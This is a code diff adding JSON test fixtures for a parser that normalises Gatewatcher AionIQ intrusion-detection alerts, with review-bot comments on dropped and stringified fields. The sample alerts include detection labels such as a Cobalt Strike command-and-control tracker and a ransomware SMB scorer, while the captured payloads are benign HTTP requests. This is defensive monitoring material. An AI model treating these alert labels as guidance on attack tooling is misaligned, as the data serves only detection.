\"R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K\",\n \"payload_printable\": \"GET /connecttest.txt HTTP/1.1\\r\\nPragma: no-cache\\r\\nUser-Agent: Microsoft NCSI\\r\\nHost: www.msftconnecttest.com\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n \"signature_id\": 2031071,\n \"gid\": 1,\n \"category\": \"Network Behavior Analytics\",\n \"action\": 
\"allowed\",\n \"signature\": \"NBA C&C tracker : cobalt strike tcp initialization\",\n \"metadata\": {\n \"performance_impact\": [\n \"High\"\n ],\n \"signature_severity\": [\n \"CRITICAL\"\n ]\n },\n \"rev\": 1,\n \"stream\": 1\n },\n \"http\": {\n \"url\": \"/connecttest.txt\",\n \"http_user_agent\": \"Microsoft NCSI\",\n \"version\": \"HTTP/1.1\",\n \"hostname\": \"www.msftconnecttest.com\",\n \"request\": {\n \"method\": \"GET\"\n },\n \"response\": {\n \"bytes\": 22,\n \"status_code\": 200,\n \"mime_type\": \"text/plain\"\n }\n },\n \"url\": {\n \"domain\": \"www.msftconnecttest.com\",\n \"path\": \"/connecttest.txt\"\n },\n \"user_agent\": {\n \"original\": \"Microsoft NCSI\"\n },\n \"packet_info\": {\n \"linktype\": 1\n },\n \"flow\": {\n \"bytes_toclient\": 700,\n \"pkts_toclient\": 3,\n \"bytes_toserver\": 407,\n \"pkts_toserver\": 4,\n \"start\": \"2022-09-01T16:06:15.602042+0000\"\n },\n \"@version\": \"1\",\n \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}" + }, + "expected": { + "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n \"version\": \"2.5.3.107\",\n \"ingress\": {\n \"interface\": {\n \"name\": \"mon0\"\n }\n }\n },\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"alert\",\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"module\": \"network_behavior_analytics\",\n \"created\": \"2022-09-01T16:06:15.605Z\",\n \"id\": \"730a47f1-f7b1-4faa-9d61-8a41d7b138ed\",\n \"severity\": 2\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"network\": {\n \"transport\": \"tcp\",\n \"protocol\": \"http\",\n \"flow_id\": 2071994639527866,\n \"community_id\": \"1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=\",\n \"timestamp\": \"2022-09-01T16:06:15.605Z\",\n \"tx_id\": 0\n },\n \"source\": {\n \"ip\": 
\"10.2.6.250\",\n \"port\": 50886,\n \"mac\": \"00:50:56:91:73:14\"\n },\n \"destination\": {\n \"ip\": \"13.107.4.52\",\n \"port\": 80,\n \"mac\": \"00:08:e3:ff:fc:28\"\n },\n \"nba\": {\n \"packet\": \"AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA\",\n \"payload\": \"R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K\",\n \"payload_printable\": \"GET /connecttest.txt HTTP/1.1\\r\\nPragma: no-cache\\r\\nUser-Agent: Microsoft NCSI\\r\\nHost: www.msftconnecttest.com\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n \"signature_id\": 2031071,\n \"gid\": 1,\n \"category\": \"Network Behavior Analytics\",\n \"action\": \"allowed\",\n \"signature\": \"NBA C&C tracker : cobalt strike tcp initialization\",\n \"metadata\": {\n \"performance_impact\": [\n \"High\"\n ],\n \"signature_severity\": [\n \"CRITICAL\"\n ]\n },\n \"rev\": 1,\n \"stream\": 1\n },\n \"http\": {\n \"url\": \"/connecttest.txt\",\n \"http_user_agent\": \"Microsoft NCSI\",\n \"version\": \"HTTP/1.1\",\n \"hostname\": \"www.msftconnecttest.com\",\n \"request\": {\n \"method\": \"GET\"\n },\n \"response\": {\n \"bytes\": 22,\n \"status_code\": 200,\n \"mime_type\": \"text/plain\"\n }\n },\n \"url\": {\n \"domain\": \"www.msftconnecttest.com\",\n \"path\": \"/connecttest.txt\"\n },\n \"user_agent\": {\n \"original\": \"Microsoft NCSI\"\n },\n \"packet_info\": {\n \"linktype\": 1\n },\n \"flow\": {\n \"bytes_toclient\": 700,\n \"pkts_toclient\": 3,\n \"bytes_toserver\": 407,\n \"pkts_toserver\": 4,\n \"start\": \"2022-09-01T16:06:15.602042+0000\"\n },\n \"@version\": \"1\",\n \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}", + "event": { + "category": [ + "intrusion_detection", + "network" + ], + "dataset": "alert", + "kind": "alert", + "module": "network_behavior_analytics", + "severity": 2 
+ },
+ "@timestamp": "2022-09-01T16:06:51.664000Z",
+ "destination": {
+ "address": "13.107.4.52",
+ "ip": "13.107.4.52",
+ "mac": "00:08:e3:ff:fc:28",
+ "port": 80
+ },
+ "gatewatcher": {
+ "event": {
+ "created": "2022-09-01T16:06:15.605000Z",
+ "id": "730a47f1-f7b1-4faa-9d61-8a41d7b138ed"
+ },
+ "flow": {
+ "bytes_toclient": 700,
+ "bytes_toserver": 407,
+ "pkts_toclient": 3,
+ "pkts_toserver": 4,
+ "start": "2022-09-01T16:06:15.602042Z"
+ },
+ "http": {
+ "hostname": "www.msftconnecttest.com"
+ },
+ "nba": {
+ "action": "allowed",
+ "category": "Network Behavior Analytics",
+ "gid": "1",
+ "metadata": {
+ "performance_impact": [
+ "High"
+ ],
+ "signature_severity": [
+ "CRITICAL"
+ ]
+ },
+ "packet": "AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA",
+ "payload": "R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K",
+ "payload_printable": "GET /connecttest.txt HTTP/1.1\r\nPragma: no-cache\r\nUser-Agent: Microsoft NCSI\r\nHost: www.msftconnecttest.com\r\nCache-Control: no-cache\r\nConnection: keep-alive\r\n\r\n",
+ "rev": "1",
+ "signature": "NBA C&C tracker : cobalt strike tcp initialization",
+ "signature_id": "2031071",
+ "stream": "1"
+ },
+ "network": {
+ "flow_id": 2071994639527866,
+ "timestamp": "2022-09-01T16:06:15.605000Z",
+ "tx_id": 0
+ },
+ "observer": {
+ "gcap": {
+ "hostname": "gcap-interne-rd-55.gatewatcher.com",
+ "ingress": {
+ "interface": {
+ "name": "mon0"
+ }
+ },
+ "version": "2.5.3.107"
+ },
+ "log_format_version": "1.0.0"
+ },
+ "version": "1"
+ },
+ "http": {
+ "request": {
+ "method": "GET"
+ },
+ "response": {
+ "bytes": 22,
+ "mime_type": "text/plain"
+ },
+ "version": "HTTP/1.1"
+ },
+ "network": {
+ "community_id": "1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=",
+ "protocol": "http",
+ "transport": "tcp"
+ },
+ "observer": {
+ "hostname":
"gcenter-interne-rd-56.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": "gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hosts": [
+ "gcenter-interne-rd-56.gatewatcher.com",
+ "www.msftconnecttest.com"
+ ],
+ "ip": [
+ "10.2.6.250",
+ "13.107.4.52"
+ ]
+ },
+ "source": {
+ "address": "10.2.6.250",
+ "ip": "10.2.6.250",
+ "mac": "00:50:56:91:73:14",
+ "port": 50886
+ },
+ "url": {
+ "domain": "www.msftconnecttest.com",
+ "path": "/connecttest.txt",
+ "registered_domain": "msftconnecttest.com",
+ "subdomain": "www",
+ "top_level_domain": "com"
+ },
+ "user_agent": {
+ "device": {
+ "name": "Other"
+ },
+ "name": "Other",
+ "original": "Microsoft NCSI",
+ "os": {
+ "name": "Other"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/ransomware.json b/GateWatcher/aioniq_ecs/tests/ransomware.json
new file mode 100644
index 000000000..38d350641
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/ransomware.json
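Review bot: The expected output of this fixture pins `gatewatcher.nba.gid`, `rev`, `signature_id` and `stream` as strings (`"gid": "1"`, `"signature_id": "2031071"`) although the source event carries them as integers, while the sigflow_alert.json fixture in this same commit keeps the equivalent `gatewatcher.sigflow.*` values numeric (`"signature_id": 2027265`, `"gid": 1`). If that mirrors the declared field types for the two namespaces rather than an oversight, aligning them is still worthwhile so a rule matching a signature id does not need a per-module, type-dependent comparison; ransomware.json has the same problem with `alert_threshold`, `malicious_behavior_confidence` and `session_score` stringified, which prevents a numeric `session_score >= alert_threshold` check. This fixture also shows `http.response.status_code` being dropped: the input has `\"status_code\": 200` under `http.response`, but the expected `http.response` keeps only `bytes` and `mime_type`, whereas sigflow_file.json maps the source's `status` into `status_code`. Presumably the parser renames `status` and does not pass an already-ECS-named `status_code` through; confirm against parser.yml, which is not in this chunk.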
@@ -0,0 +1,87 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"source\": {\n \"ip\": \"172.31.47.105\",\n \"port\": 50066\n },\n \"event\": {\n \"created\": \"2024-09-13T09:11:20.223813+00:00\",\n \"dataset\": \"alert\",\n \"end\": \"2024-09-13T09:09:11.988000\",\n \"module\": \"ransomware_detect\",\n \"kind\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"start\": \"2024-09-13T09:08:51.988000\",\n \"id\": \"f357f7d1-e322-4f67-b798-50d05f54204b\",\n \"severity\": 1\n },\n \"observer\": {\n \"product\": \"gcenter\",\n \"log_format_version\": \"1.0.0\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"version\": \"2.5.4.0-rc1\",\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\"\n },\n \"version\": \"2.5.3.103\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\"\n },\n \"destination\": {\n \"ip\": \"172.31.33.0\",\n \"port\": 445\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"ransomware\": {\n \"alert_threshold\": 648,\n \"malicious_behavior_confidence\": 80,\n \"session_score\": 37\n },\n \"@timestamp\": \"2024-09-13T09:11:39.629080222Z\",\n \"smb\": {\n \"session_id\": 593737889611873\n },\n \"network\": {\n \"protocol\": \"smb\",\n \"flow_id\": 1465670492342121,\n \"transport\": \"tcp\",\n \"timestamp\": \"2024-09-13T09:08:44.877000+00:00\",\n \"community_id\": \"1:RA5iYDlaiu3WMutFLj5r//rbk34=\"\n },\n \"@version\": \"1\"\n}" + }, + "expected": { + "message": "{\n \"source\": {\n \"ip\": \"172.31.47.105\",\n \"port\": 50066\n },\n \"event\": {\n \"created\": \"2024-09-13T09:11:20.223813+00:00\",\n \"dataset\": \"alert\",\n \"end\": \"2024-09-13T09:09:11.988000\",\n \"module\": \"ransomware_detect\",\n \"kind\": \"alert\",\n \"category\": [\n \"network\",\n 
\"intrusion_detection\"\n ],\n \"start\": \"2024-09-13T09:08:51.988000\",\n \"id\": \"f357f7d1-e322-4f67-b798-50d05f54204b\",\n \"severity\": 1\n },\n \"observer\": {\n \"product\": \"gcenter\",\n \"log_format_version\": \"1.0.0\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"version\": \"2.5.4.0-rc1\",\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\"\n },\n \"version\": \"2.5.3.103\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\"\n },\n \"destination\": {\n \"ip\": \"172.31.33.0\",\n \"port\": 445\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"ransomware\": {\n \"alert_threshold\": 648,\n \"malicious_behavior_confidence\": 80,\n \"session_score\": 37\n },\n \"@timestamp\": \"2024-09-13T09:11:39.629080222Z\",\n \"smb\": {\n \"session_id\": 593737889611873\n },\n \"network\": {\n \"protocol\": \"smb\",\n \"flow_id\": 1465670492342121,\n \"transport\": \"tcp\",\n \"timestamp\": \"2024-09-13T09:08:44.877000+00:00\",\n \"community_id\": \"1:RA5iYDlaiu3WMutFLj5r//rbk34=\"\n },\n \"@version\": \"1\"\n}", + "event": { + "category": [ + "intrusion_detection", + "network" + ], + "dataset": "alert", + "kind": "alert", + "module": "ransomware_detect", + "severity": 1 + }, + "@timestamp": "2024-09-13T09:11:39.629080Z", + "destination": { + "address": "172.31.33.0", + "ip": "172.31.33.0", + "port": 445 + }, + "gatewatcher": { + "event": { + "created": "2024-09-13T09:11:20.223813Z", + "id": "f357f7d1-e322-4f67-b798-50d05f54204b" + }, + "network": { + "flow_id": 1465670492342121, + "timestamp": "2024-09-13T09:08:44.877000Z" + }, + "observer": { + "gcap": { + "hostname": "gcap-clement-l.gatewatcher.fr", + "ingress": { + "interface": { + "name": "monvirt" + } + }, + "version": "2.5.4.0-rc1" + }, + "log_format_version": "1.0.0", + "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f" + }, + "ransomware": { + "alert_threshold": "648", + 
"malicious_behavior_confidence": "80",
+ "session_score": "37"
+ },
+ "smb": {
+ "session_id": 593737889611873
+ },
+ "version": "1"
+ },
+ "network": {
+ "community_id": "1:RA5iYDlaiu3WMutFLj5r//rbk34=",
+ "protocol": "smb",
+ "transport": "tcp"
+ },
+ "observer": {
+ "hostname": "gcenter-clelyo-01.gatewatcher.com",
+ "product": "gcenter",
+ "vendor": "gatewatcher",
+ "version": "2.5.3.103"
+ },
+ "related": {
+ "hosts": [
+ "gcenter-clelyo-01.gatewatcher.com"
+ ],
+ "ip": [
+ "172.31.33.0",
+ "172.31.47.105"
+ ]
+ },
+ "source": {
+ "address": "172.31.47.105",
+ "ip": "172.31.47.105",
+ "port": 50066
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/retrohunt.json b/GateWatcher/aioniq_ecs/tests/retrohunt.json
new file mode 100644
index 000000000..2ac0df9b6
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/retrohunt.json
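Review bot: The time window of the ransomware alert is lost in this fixture: the input carries `event.start` (`2024-09-13T09:08:51.988000`) and `event.end` (`2024-09-13T09:09:11.988000`), but the expected output has neither `event.start`/`event.end` nor a `gatewatcher.event.start`/`end`, while `event.created` is kept. For an SMB session scored against `alert_threshold`, those bounds are what an analyst uses to scope which share activity to examine, so they are worth mapping; note the source values have no timezone suffix, so the mapping needs the same normalisation that `created` receives (`...Z`). The parser stage that produces this output is outside the chunk, so this may be deliberate; if it is, the fixture is the place that should show the dropped keys being ignored on purpose rather than just omitting them.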
@@ -0,0 +1,49 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{\n \"observer\": {\n \"id\": \"\"\n },\n \"event\": {\n \"kind\": \"alert\",\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"module\": \"retrohunt\",\n \"created\": \"2022-12-14T09:51:30.455Z\",\n \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\",\n \"severity\": 2\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"network\": {\n \"ether\": \"\"\n },\n \"source\": {\n \"ip\": \"127.0.0.1\",\n \"port\": \"80\"\n },\n \"destination\": {\n \"ip\": \"127.0.0.1\",\n \"port\": \"8080\"\n },\n \"matched_event\": {\n \"id\": \"1\"\n },\n \"ioc\": {\n \"id\": \"1\"\n },\n \"@timestamp\": \"2022-09-01T12:49:07.749Z\"\n}" + }, + "expected": { + "message": "{\n \"observer\": {\n \"id\": \"\"\n },\n \"event\": {\n \"kind\": \"alert\",\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"module\": \"retrohunt\",\n \"created\": \"2022-12-14T09:51:30.455Z\",\n \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\",\n \"severity\": 2\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"network\": {\n \"ether\": \"\"\n },\n \"source\": {\n \"ip\": \"127.0.0.1\",\n \"port\": \"80\"\n },\n \"destination\": {\n \"ip\": \"127.0.0.1\",\n \"port\": \"8080\"\n },\n \"matched_event\": {\n \"id\": \"1\"\n },\n \"ioc\": {\n \"id\": \"1\"\n },\n \"@timestamp\": \"2022-09-01T12:49:07.749Z\"\n}", + "event": { + "category": [ + "intrusion_detection", + "network" + ], + "dataset": "alert", + "kind": "alert", + "module": "retrohunt", + "severity": 2 + }, + "@timestamp": "2022-09-01T12:49:07.749000Z", + "destination": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 8080 + }, + "gatewatcher": { + "event": { + "created": "2022-12-14T09:51:30.455000Z", + "id": "8223b432-7e97-4570-a29d-254f41dbb9db" + }, + "matched_event": { + "id": 
"1"
+ }
+ },
+ "related": {
+ "ip": [
+ "127.0.0.1"
+ ]
+ },
+ "source": {
+ "address": "127.0.0.1",
+ "ip": "127.0.0.1",
+ "port": 80
+ }
+ }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/sigflow_alert.json b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json
new file mode 100644
index 000000000..2994c798a
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json
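Review bot: The indicator identity is dropped in this fixture: the input has `\"ioc\": {\"id\": \"1\"}` next to `matched_event`, but the expected `gatewatcher` object keeps only `event` and `matched_event`, so a retrohunt alert cannot be tied back to the IOC that fired. Since `matched_event.id` is preserved as `gatewatcher.matched_event.id`, the symmetric `gatewatcher.ioc.id` looks like the intended shape; confirm against parser.yml and fields.yml, which are outside this chunk. The fixture does usefully pin the coercion of `source.port`/`destination.port` from the strings `\"80\"`/`\"8080\"` to integers, and it is the only fixture in the commit that exercises it, so keep that case when the file is regenerated.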
@@ -0,0 +1,127 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ V103", + "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" + } + }, + "message": "{ \n \"observer\": { \n \"vendor\": \"gatewatcher\", \n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\", \n \"gcap\": { \n \"ingress\": { \n \"interface\": { \n \"name\": \"monvirt\" \n } \n }, \n \"hostname\": \"gcap-clement-l.gatewatcher.fr\", \n \"version\": \"2.5.4.0-rc1\" \n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"mac\": \"00:6f:37:76:51:45\",\n \"port\": 62832,\n \"ip\": \"65.100.113.120\"\n },\n \"metadata\": {\n \"flowbits\": [\n \"http.dottedquadhost.pdf\"\n ]\n },\n \"@timestamp\": \"2024-09-11T13:55:34.006Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"community_id\": \"1:8T6+TppVoaMkXwi+BTjnzAYozVc=\",\n \"timestamp\": \"2024-09-11T13:55:01.080901+0000\",\n \"transport\": \"tcp\",\n \"tx_id\": 0,\n \"flow_id\": 1331841998337663\n },\n \"destination\": {\n \"mac\": \"00:43:70:57:75:55\",\n \"port\": 80,\n \"ip\": \"56.53.117.115\"\n },\n \"flow\": {\n \"bytes_toclient\": 1362,\n \"bytes_toserver\": 358,\n \"pkts_toclient\": 3,\n \"start\": \"2024-09-11T13:55:01.079487+0000\",\n \"pkts_toserver\": 4\n },\n \"url\": {\n \"domain\": \"56.53.117.115\",\n \"path\": \"/malcore_10KB_clean.pdf\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"56.53.117.115\",\n \"version\": \"HTTP/1.1\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/pdf\",\n \"bytes\": 1135\n }\n },\n \"sigflow\": {\n \"action\": \"allowed\",\n \"metadata\": {\n \"signature_severity\": [\n \"Informational\"\n ],\n \"attack_target\": [\n \"Client_Endpoint\"\n ],\n \"created_at\": [\n \"2019_04_23\"\n ],\n \"deployment\": [\n \"Perimeter\"\n ],\n 
\"performance_impact\": [\n \"Significant\"\n ],\n \"updated_at\": [\n \"2022_11_21\"\n ]\n },\n \"signature\": \"ET INFO Dotted Quad Host PDF Request\",\n \"payload_printable\": \"GET /malcore_10KB_clean.pdf HTTP/1.1\\r\\nHost: 56.53.117.115\\r\\nAccept-Encoding: gzip,compress,deflate\\r\\nKeep-Alive: 300\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n \"packet\": \"AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA\",\n \"stream\": 1,\n \"signature_id\": 2027265,\n \"rev\": 4,\n \"category\": \"Potentially Bad Traffic\",\n \"gid\": 1,\n \"packet_info\": {\n \"linktype\": 1\n },\n \"payload\": \"R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==\"\n },\n \"event\": {\n \"dataset\": \"alert\",\n \"kind\": \"alert\",\n \"module\": \"sigflow_alert\",\n \"severity\": 2,\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"id\": \"58c28570-6c90-4ba9-b9b5-f72867d5fa08\",\n \"created\": \"2024-09-11T13:55:01.080901+0000\"\n }\n}" + }, + "expected": { + "message": "{ \n \"observer\": { \n \"vendor\": \"gatewatcher\", \n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\", \n \"gcap\": { \n \"ingress\": { \n \"interface\": { \n \"name\": \"monvirt\" \n } \n }, \n \"hostname\": \"gcap-clement-l.gatewatcher.fr\", \n \"version\": \"2.5.4.0-rc1\" \n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"mac\": \"00:6f:37:76:51:45\",\n \"port\": 62832,\n \"ip\": \"65.100.113.120\"\n },\n \"metadata\": {\n \"flowbits\": [\n \"http.dottedquadhost.pdf\"\n ]\n },\n \"@timestamp\": \"2024-09-11T13:55:34.006Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"community_id\": \"1:8T6+TppVoaMkXwi+BTjnzAYozVc=\",\n \"timestamp\": \"2024-09-11T13:55:01.080901+0000\",\n 
\"transport\": \"tcp\",\n \"tx_id\": 0,\n \"flow_id\": 1331841998337663\n },\n \"destination\": {\n \"mac\": \"00:43:70:57:75:55\",\n \"port\": 80,\n \"ip\": \"56.53.117.115\"\n },\n \"flow\": {\n \"bytes_toclient\": 1362,\n \"bytes_toserver\": 358,\n \"pkts_toclient\": 3,\n \"start\": \"2024-09-11T13:55:01.079487+0000\",\n \"pkts_toserver\": 4\n },\n \"url\": {\n \"domain\": \"56.53.117.115\",\n \"path\": \"/malcore_10KB_clean.pdf\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"56.53.117.115\",\n \"version\": \"HTTP/1.1\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/pdf\",\n \"bytes\": 1135\n }\n },\n \"sigflow\": {\n \"action\": \"allowed\",\n \"metadata\": {\n \"signature_severity\": [\n \"Informational\"\n ],\n \"attack_target\": [\n \"Client_Endpoint\"\n ],\n \"created_at\": [\n \"2019_04_23\"\n ],\n \"deployment\": [\n \"Perimeter\"\n ],\n \"performance_impact\": [\n \"Significant\"\n ],\n \"updated_at\": [\n \"2022_11_21\"\n ]\n },\n \"signature\": \"ET INFO Dotted Quad Host PDF Request\",\n \"payload_printable\": \"GET /malcore_10KB_clean.pdf HTTP/1.1\\r\\nHost: 56.53.117.115\\r\\nAccept-Encoding: gzip,compress,deflate\\r\\nKeep-Alive: 300\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n \"packet\": \"AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA\",\n \"stream\": 1,\n \"signature_id\": 2027265,\n \"rev\": 4,\n \"category\": \"Potentially Bad Traffic\",\n \"gid\": 1,\n \"packet_info\": {\n \"linktype\": 1\n },\n \"payload\": \"R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==\"\n },\n \"event\": {\n \"dataset\": \"alert\",\n \"kind\": \"alert\",\n \"module\": \"sigflow_alert\",\n \"severity\": 2,\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"id\": 
\"58c28570-6c90-4ba9-b9b5-f72867d5fa08\",\n \"created\": \"2024-09-11T13:55:01.080901+0000\"\n }\n}",
+ "event": {
+ "category": [
+ "intrusion_detection",
+ "network"
+ ],
+ "dataset": "alert",
+ "kind": "alert",
+ "module": "sigflow_alert",
+ "severity": 2
+ },
+ "@timestamp": "2024-09-11T13:55:34.006000Z",
+ "destination": {
+ "address": "56.53.117.115",
+ "ip": "56.53.117.115",
+ "mac": "00:43:70:57:75:55",
+ "port": 80
+ },
+ "gatewatcher": {
+ "event": {
+ "created": "2024-09-11T13:55:01.080901Z",
+ "id": "58c28570-6c90-4ba9-b9b5-f72867d5fa08"
+ },
+ "flow": {
+ "bytes_toclient": 1362,
+ "bytes_toserver": 358,
+ "pkts_toclient": 3,
+ "pkts_toserver": 4,
+ "start": "2024-09-11T13:55:01.079487Z"
+ },
+ "http": {
+ "hostname": "56.53.117.115"
+ },
+ "metadata": {
+ "flowbits": [
+ "http.dottedquadhost.pdf"
+ ]
+ },
+ "network": {
+ "flow_id": 1331841998337663,
+ "timestamp": "2024-09-11T13:55:01.080901Z",
+ "tx_id": 0
+ },
+ "observer": {
+ "gcap": {
+ "hostname": "gcap-clement-l.gatewatcher.fr",
+ "ingress": {
+ "interface": {
+ "name": "monvirt"
+ }
+ },
+ "version": "2.5.4.0-rc1"
+ },
+ "log_format_version": "1.0.0",
+ "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+ },
+ "sigflow": {
+ "action": "allowed",
+ "category": "Potentially Bad Traffic",
+ "gid": 1,
+ "metadata": "{\"attack_target\": [\"Client_Endpoint\"], \"created_at\": [\"2019_04_23\"], \"deployment\": [\"Perimeter\"], \"performance_impact\": [\"Significant\"], \"signature_severity\": [\"Informational\"], \"updated_at\": [\"2022_11_21\"]}",
+ "packet": "AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA",
+ "packet_info": "{\"linktype\": 1}",
+ "payload": "R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
+ "payload_printable": "GET /malcore_10KB_clean.pdf HTTP/1.1\r\nHost: 56.53.117.115\r\nAccept-Encoding:
gzip,compress,deflate\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\n\r\n",
+ "rev": 4,
+ "signature": "ET INFO Dotted Quad Host PDF Request",
+ "signature_id": 2027265,
+ "stream": 1
+ },
+ "version": "1"
+ },
+ "http": {
